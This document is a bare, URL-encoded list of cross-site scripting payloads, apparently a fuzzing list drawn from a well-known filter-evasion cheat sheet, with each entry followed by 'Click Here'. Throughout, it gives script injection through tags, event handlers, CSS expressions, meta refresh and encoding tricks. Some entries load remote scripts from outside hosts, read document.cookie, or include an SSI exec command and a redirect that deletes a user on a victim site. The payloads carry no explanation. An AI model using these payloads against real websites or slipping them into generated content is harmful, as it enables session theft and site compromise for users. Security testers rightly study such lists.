%3cMETA%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3c%(css)s%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cSTYLE%3e@import'%(css)s'%3b%3c%2fSTYLE%3eClick Here

%3cXSS%20STYLE%3d%22behavior%3a%20url(%(htc)s)%3b%22%3eClick Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%22javascript%3ajavascript%3aalert(1)%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSSClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3ajavascript%3aalert(1))%22%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3aexpression(javascript%3aalert(1))%3b%22%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(javascript%3aalert(1))%22%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(javascript%3aalert(1))%22%3eClick Here

%3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3ajavascript%3aalert(1)%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fA%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3ajavascript%3aalert(1)%22)%7d%3c%2fSTYLE%3eClick Here

%3c!--[if%20gte%20IE%204]%3e%3cSCRIPT%3ejavascript%3aalert(1)%3b%3c%2fSCRIPT%3e%3c![endif]--%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22%(scriptlet)s%22%3e%3c%2fOBJECT%3eClick Here

%3cBASE%20HREF%3d%22javascript%3ajavascript%3aalert(1)%3b%2f%2f%22%3eClick Here

%3cOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%3e%3cparam%20name%3durl%20value%3djavascript%3ajavascript%3aalert(1)%3e%3c%2fOBJECT%3eClick Here

%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-%(payload)s%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3cform%20id%3d%22test%22%20%2f%3e%3cbutton%20form%3d%22test%22%20formaction%3d%22javascript%3ajavascript%3aalert(1)%22%3eXClick Here

%3cSCRIPT%20SRC%3d%22%(jpg)s%22%3e%3c%2fSCRIPT%3eClick Here

%3cP%20STYLE%3d%22behavior%3aurl('%23default%23time2')%22%20end%3d%220%22%20onEnd%3d%22javascript%3aalert(1)%22%3eClick Here

%3cSTYLE%3e@import'%(css)s'%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%3ea%7bbackground%3aurl('s1'%20's2)%7d@import%20javascript%3ajavascript%3aalert(1)%3b')%3b%7d%3c%2fSTYLE%3eClick Here

%3cmeta%20charset%3d%20%22x-imap4-modified-utf7%22%26%26%3e%26%26%3cscript%26%26%3ejavascript%3aalert(1)%26%26%3b%26%26%3c%26%26%2fscript%26%26%3eClick Here

%3cSCRIPT%20onreadystatechange%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fSCRIPT%3eClick Here

%3cembed%20code%3d%(scriptlet)s%3e%3c%2fembed%3eClick Here

%3cstyle%20onreadystatechange%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fstyle%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%3f%3e%3chtml%3ahtml%20xmlns%3ahtml%3d'http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml'%3e%3chtml%3ascript%3ejavascript%3aalert(1)%3b%3c%2fhtml%3ascript%3e%3c%2fhtml%3ahtml%3eClick Here

%3cembed%20src%3d%(jscript)s%3e%3c%2fembed%3eClick Here

%3cembed%20code%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fembed%3eClick Here

%3cframeset%20onload%3djavascript%3ajavascript%3aalert(1)%3e%3c%2fframeset%3eClick Here

%3cobject%20onerror%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cembed%20type%3d%22image%22%20src%3d%(scriptlet)s%3e%3c%2fembed%3eClick Here

%3cXML%20ID%3dI%3e%3cX%3e%3cC%3e%3c![CDATA[%3cIMG%20SRC%3d%22javas]]%3c![CDATA[cript%3ajavascript%3aalert(1)%3b%22%3e]]%3c%2fC%3e%3cX%3e%3c%2fxml%3eClick Here

%3cIMG%20SRC%3d%26%7bjavascript%3aalert(1)%3b%7d%3b%3eClick Here

%3ca%20href%3d%22jav%26%2365ascript%3ajavascript%3aalert(1)%22%3etest1%3c%2fa%3eClick Here

%3ca%20href%3d%22jav%26%2397ascript%3ajavascript%3aalert(1)%22%3etest1%3c%2fa%3eClick Here

%3cembed%20width%3d500%20height%3d500%20code%3d%22data%3atext%2fhtml,%3cscript%3e%(payload)s%3c%2fscript%3e%22%3e%3c%2fembed%3eClick Here

'%3balert(String%2efromCharCode(88,83,83))%2f%2f'%3balert(String%2efromCharCode(88,83,83))%2f%2f%22%3bClick Here

%3ciframe%20srcdoc%3d%22%26LT%3biframe%26sol%3bsrcdoc%3d%26amp%3blt%3bimg%26sol%3bsrc%3d%26amp%3bapos%3b%26amp%3bapos%3bonerror%3djavascript%3aalert(1)%26amp%3bgt%3b%3e%22%3eClick Here

alert(String%2efromCharCode(88,83,83))%2f%2f%22%3balert(String%2efromCharCode(88,83,83))%2f%2f--Click Here

%3e%3c%2fSCRIPT%3e%22%3e'%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3d%60javascript%3aalert(%22RSnake%20says,%20'XSS'%22)%60%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%22XSS%22)%3eClick Here

%3ca%20onmouseover%3dalert(document%2ecookie)%3exxs%20link%3c%2fa%3eClick Here

%3ca%20onmouseover%3d%22alert(document%2ecookie)%22%3exxs%20link%3c%2fa%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%3cIMG%20SRC%3d%23%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3d%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cIMG%20SRC%3d%22jav%20ascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x09%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0A%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0D%3bascript%3aalert('XSS')%3b%22%3eClick Here

perl%20-e%20'print%20%22%3cIMG%20SRC%3djava%5c0script%3aalert(%5c%22XSS%5c%22)%3e%22%3b'%20%3e%20outClick Here

%3cIMG%20SRC%3d%22%20%26%2314%3b%20%20javascript%3aalert('XSS')%3b%22%3eClick Here

%3cSCRIPT%2fXSS%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cBODY%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22XSS%22)%3eClick Here

%3cSCRIPT%2fSRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3f%3c%20B%20%3eClick Here

%3cSCRIPT%20SRC%3d%2f%2fha%2eckers%2eorg%2f%2ej%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%22Click Here

%5c%22%3balert('XSS')%3b%2f%2fClick Here

%3ciframe%20src%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3cClick Here

%3c%2fTITLE%3e%3cSCRIPT%3ealert(%22XSS%22)%3b%3c%2fSCRIPT%3eClick Here

%3cBODY%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20DYNSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSS%3c%2fbr%3eClick Here

%3cBODY%20ONLOAD%3dalert('XSS')%3eClick Here

%3cIMG%20SRC%3d%22livescript%3a[code]%22%3eClick Here

%3cIMG%20SRC%3d'vbscript%3amsgbox(%22XSS%22)'%3eClick Here

%3cBR%20SIZE%3d%22%26%7balert('XSS')%7d%22%3eClick Here

%3cBGSOUND%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cSTYLE%3e@import'http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss'%3b%3c%2fSTYLE%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%22%3eClick Here

%3cSTYLE%3eBODY%7b-moz-binding%3aurl(%22http%3a%2f%2fha%2eckers%2eorg%2fxssmoz%2exml%23xss%22)%7d%3c%2fSTYLE%3eClick Here

%3cSTYLE%3e@im%5cport'%5cja%5cvasc%5cript%3aalert(%22XSS%22)'%3b%3c%2fSTYLE%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3chttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(alert('XSS'))%22%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bxss%3aex%2f%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(alert(%22XSS%22))'%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ealert('XSS')%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fA%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(alert('XSS'))%22%3eClick Here

%3cXSS%20STYLE%3d%22behavior%3a%20url(xss%2ehtc)%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3ddata%3atext%2fhtml%20base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3aalert('XSS'))%22%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%5c0075%5c0072%5c006C%5c0028'%5c006a%5c0061%5c0076%5c0061%5c0073%5c0063%5c0072%5c0069%5c0070%5c0074%5c003a%5c0061%5c006c%5c0065%5c0072%5c0074%5c0028%2e1027%5c0058%2e1053%5c0053%5c0027%5c0029'%5c0029%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3a%20expression(alert('XSS'))%3b%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(%26%231%3bjavascript%3aalert('XSS'))%22%3eClick Here

%3cBASE%20HREF%3d%22javascript%3aalert('XSS')%3b%2f%2f%22%3eClick Here

%20%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%22%3e%3c%2fOBJECT%3eClick Here

%3cSCRIPT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejpg%22%3e%3c%2fSCRIPT%3eClick Here

%3c%3f%20echo('%3cSCR)'%3becho('IPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e')%3b%20%3f%3eClick Here

Redirect%20302%20%2fa%2ejpg%20http%3a%2f%2fvictimsite%2ecom%2fadmin%2easp%26deleteuserClick Here

%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'%3cSCR'%22--%3e%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'IPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3e'%22--%3eClick Here

%3cIMG%20SRC%3d%22http%3a%2f%2fwww%2ethesiteyouareon%2ecom%2fsomecommand%2ephp%3fsomevariables%3dmaliciouscode%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Set-Cookie%22%20Content%3d%22USERID%3d%3cSCRIPT%3ealert('XSS')%3c%2fSCRIPT%3e%22%3eClick Here

%20%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-alert('XSS')%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3cSCRIPT%20%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%60%3e%60%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f1113982867%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f0x42%2e0x0000066%2e0x7%2e0x93%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f66%2e102%2e7%2e147%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f0102%2e0146%2e0007%2e00000223%2f%22%3eXSS%3c%2fA%3eClick Here

%3ciframe%20%20src%3d%22%26Tab%3bjavascript%3aprompt(1)%26Tab%3b%22%3eClick Here

%3cA%20HREF%3d%22htt%20p%3a%2f%2f6%206%2e000146%2e0x7%2e147%2f%22%3eXSS%3c%2fA%3eClick Here

%3cinput%2fonmouseover%3d%22javaSCRIPT%26colon%3bconfirm%26lpar%3b1%26rpar%3b%22Click Here

%3csvg%3e%3cstyle%3e%7bfont-family%26colon%3b'%3ciframe%2fonload%3dconfirm(1)%3e'Click Here

%3csVg%3e%3cscRipt%20%3ealert%26lpar%3b1%26rpar%3b%20%7bOpera%7dClick Here

%3cimg%2fsrc%3d%60%60%20onerror%3dthis%2eonerror%3dconfirm(1)%20Click Here

%3cform%3e%3cisindex%20formaction%3d%22javascript%26colon%3bconfirm(1)%22Click Here

%3cimg%20src%3d%60%60%26NewLine%3b%20onerror%3dalert(1)%26NewLine%3bClick Here

%3cScRipT%205-0%2a3%2b9%2f3%3d%3eprompt(1)%3c%2fScRipT%20giveanswerhere%3d%3fClick Here

%3cscript%2f%26Tab%3b%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%2f%26Tab%3b%3e%3c%2fscript%3eClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d%22%3eClick Here

%3cscript%20%2f%2a%2a%2f%3e%2f%2a%2a%2falert(1)%2f%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2fClick Here

%26%2334%3b%26%2362%3b%3ch1%2fonmouseover%3d'%5cu0061lert(1)'%3eClick Here

%3csvg%3e%3cscript%20xlink%3ahref%3ddata%26colon%3b,window%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3e%3c%2fscriptClick Here

%3cmeta%20content%3d%22%26NewLine%3b%201%20%26NewLine%3b%3b%20JAVASCRIPT%26colon%3b%20alert(1)%22%20http-equiv%3d%22refresh%22%2f%3eClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml,%3csvg%20%26%23111%3b%26%23110%3bload%3dalert(1)%3e%22%3eClick Here

%3csvg%3e%3cscript%20x%3ahref%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%7bOpera%7dClick Here

%3ciframe%20src%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3blocation%26rpar%3b%3eClick Here

%3cform%3e%3ca%20href%3d%22javascript%3a%5cu0061lert%26%23x28%3b1%26%23x29%3b%22%3eXClick Here

%3c%2fscript%3e%3cimg%2f%2a%2fsrc%3d%22worksinchrome%26colon%3bprompt%26%23x28%3b1%26%23x29%3b%22%2f%2a%2fonerror%3d'eval(src)'%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3aconfirm(1)%22%3eClick Here

%3cimg%2f%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%60~%60%20onerror%3dprompt(1)%3eClick Here

%3cform%3e%3ciframe%20%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%22javascript%26%2358%3balert(1)%22%26%2311%3b%26%2310%3b%26%2309%3b%3b%3eClick Here

%3ca%20href%3d%22data%3aapplication%2fx-x509-user-cert%3b%26NewLine%3bbase64%26NewLine%3b,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%26%2309%3b%26%2310%3b%26%2311%3b%3eX%3c%2faClick Here

http%3a%2f%2fwww%2egoogle%3cscript%20%2ecom%3ealert(document%2elocation)%3c%2fscriptClick Here

%3cimg%2fsrc%3d@%26%2332%3b%26%2313%3b%20onerror%20%3d%20prompt('%26%2349%3b')Click Here

%3ca%26%2332%3bhref%26%2361%3b%26%2391%3b%26%2300%3b%26%2393%3b%22%26%2300%3b%20onmouseover%3dprompt%26%2340%3b1%26%2341%3b%26%2347%3b%26%2347%3b%22%3eXYZ%3c%2faClick Here

%3cscript%20%5e__%5e%3ealert(String%2efromCharCode(49))%3c%2fscript%20%5e__%5eClick Here

%3cstyle%2fonload%3dprompt%26%2340%3b'%26%2388%3b%26%2383%3b%26%2383%3b'%26%2341%3bClick Here

%3c%2fstyle%20%26%2332%3b%3e%3cscript%20%26%2332%3b%20%3a-(%3e%2f%2a%2a%2falert(document%2elocation)%2f%2a%2a%2f%3c%2fscript%20%26%2332%3b%20%3a-(Click Here

%26%2300%3b%3c%2fform%3e%3cinput%20type%26%2361%3b%22date%22%20onfocus%3d%22alert(1)%22%3eClick Here

%3cform%3e%3ctextarea%20%26%2313%3b%20onkeyup%3d'%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074%26%23x28%3b1%26%23x29%3b'%3eClick Here

%3cscript%20%2f%2a%2a%2a%2f%3e%2f%2a%2a%2a%2fconfirm('%5cuFF41%5cuFF4C%5cuFF45%5cuFF52%5cuFF54%5cu1455%5cuFF11%5cu1450')%2f%2a%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2a%2fClick Here

%3ciframe%20srcdoc%3d'%26lt%3bbody%20onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'%3eClick Here

%3cscript%20~~~%3ealert(0%0)%3c%2fscript%20~~~%3eClick Here

%3cstyle%2fonload%3d%26lt%3b!--%26%2309%3b%26gt%3b%26%2310%3balert%26%2310%3b%26lpar%3b1%26rpar%3b%3eClick Here

%3ca%20href%3d%22javascript%3avoid(0)%22%20onmouseover%3d%26NewLine%3bjavascript%3aalert(1)%26NewLine%3b%3eX%3c%2fa%3eClick Here

%3c%2f%2f%2fstyle%2f%2f%2f%3e%3cspan%20%2F%20onmousemove%3d'alert%26lpar%3b1%26rpar%3b'%3eSPANClick Here

%26%2334%3b%26%2362%3b%3csvg%3e%3cstyle%3e%7b-o-link-source%26colon%3b'%3cbody%2fonload%3dconfirm(1)%3e'Click Here

%3cimg%2fsrc%3d'http%3a%2f%2fi%2eimgur%2ecom%2fP8mL8%2ejpg'%20onmouseover%3d%26Tab%3bprompt(1)Click Here

%3cmarquee%20onstart%3d'javascript%3aalert%26%23x28%3b1%26%23x29%3b'%3e%5e__%5eClick Here

%3cdiv%2fstyle%3d%22width%3aexpression(confirm(1))%22%3eX%3c%2fdiv%3e%20%7bIE7%7dClick Here

%26%2313%3b%3cblink%2f%26%2313%3b%20onmouseover%3dpr%26%23x6F%3bmp%26%23116%3b(1)%3eOnMouseOver%20%7bFirefox%20%26%20Opera%7dClick Here

%3ciframe%2f%2f%20src%3djavaSCRIPT%26colon%3balert(1)Click Here

%2f%2f%3cform%2faction%3djavascript%26%23x3A%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3e%3cinput%2ftype%3d'submit'%3e%2f%2fClick Here

%2f%2f%7c%5c%5c%20%3cscript%20%2f%2f%7c%5c%5c%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%3e%20%2f%2f%7c%5c%5c%20%3c%2fscript%20%2f%2f%7c%5c%5cClick Here

%2f%2aiframe%2fsrc%2a%2f%3ciframe%2fsrc%3d%22%3ciframe%2fsrc%3d@%22%2fonload%3dprompt(1)%20%2f%2aiframe%2fsrc%2a%2f%3eClick Here

%3ca%2fhref%3d%22javascript%3a%26%2313%3b%20javascript%3aprompt(1)%22%3e%3cinput%20type%3d%22X%22%3eClick Here

%3c%2ffont%3e%2f%3csvg%3e%3cstyle%3e%7bsrc%26%23x3A%3b'%3cstyle%2fonload%3dthis%2eonload%3dconfirm(1)%3e'%3c%2ffont%3e%2f%3c%2fstyle%3eClick Here

%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)Click Here

%3ca%20href%3d%22javascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t%26lpar%3b1%26rpar%3b%22%3e%3cbutton%3eClick Here

%3c%2fsvg%3e''%3csvg%3e%3cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3ealert%26%23x28%3b1%26%23x29%3b%20%7bOpera%7dClick Here

%3cdiv%20onmouseover%3d'alert%26lpar%3b1%26rpar%3b'%3eDIV%3c%2fdiv%3eClick Here

%3ciframe%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%3eClick Here

%3ca%20href%3d%22jAvAsCrIpT%26colon%3balert%26lpar%3b1%26rpar%3b%22%3eX%3c%2fa%3eClick Here

%3cobject%20data%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3cembed%20src%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3cvar%20onmouseover%3d%22prompt(1)%22%3eOn%20Mouse%20Over%3c%2fvar%3eClick Here

%3cimg%20src%3d%22%2f%22%20%3d_%3d%22%20title%3d%22onerror%3d'prompt(1)'%22%3eClick Here

%3ca%20href%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3eClick%20Here%3c%2fa%3eClick Here

%3cscript%20src%3d%22data%3atext%2fjavascript,alert(1)%22%3e%3c%2fscript%3eClick Here

%3c%%3c!--'%%3e%3cscript%3ealert(1)%3b%3c%2fscript%20--%3eClick Here

%3ciframe%2fsrc%20%5c%2f%5c%2fonload%20%3d%20prompt(1)Click Here

%3csvg%2fonload%3dalert(1)Click Here

%3cinput%20value%3d%3c%3e%3ciframe%2fsrc%3djavascript%3aconfirm(1)Click Here

%3ciframe%2fonreadystatechange%3dalert(1)Click Here

%3ciframe%20src%3dj%26Tab%3ba%26Tab%3bv%26Tab%3ba%26Tab%3bs%26Tab%3bc%26Tab%3br%26Tab%3bi%26Tab%3bp%26Tab%3bt%26Tab%3b%3aa%26Tab%3bl%26Tab%3be%26Tab%3br%26Tab%3bt%26Tab%3b%28%26Tab%3b1%26Tab%3b%29%3e%3c%2fiframe%3eClick Here

%3cinput%20type%3d%22text%22%20value%3d%60%60%20%3cdiv%2fonmouseover%3d'alert(1)'%3eX%3c%2fdiv%3eClick Here

%3cimg%20src%3d%60xx%3axx%60onerror%3dalert(1)%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3bjavascript%26colon%3balert(1)%22%2f%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3cobject%20type%3d%22text%2fx-scriptlet%22%20data%3d%22http%3a%2f%2fjsfiddle%2enet%2fXLE63%2f%20%22%3e%3c%2fobject%3eClick Here

%3cembed%20code%3d%22http%3a%2f%2fbusinessinfo%2eco%2euk%2flabs%2fxss%2fxss%2eswf%22%20allowscriptaccess%3dalways%3eClick Here

%3csvg%20contentScriptType%3dtext%2fvbs%3e%3cscript%3eMsgBox%2b1Click Here

%3ca%20href%3d%22data%3atext%2fhtml%3bbase64_,%3csvg%2fonload%3d%5cu0061%26%23x6C%3b%26%23101%72t(1)%3e%22%3eX%3c%2faClick Here

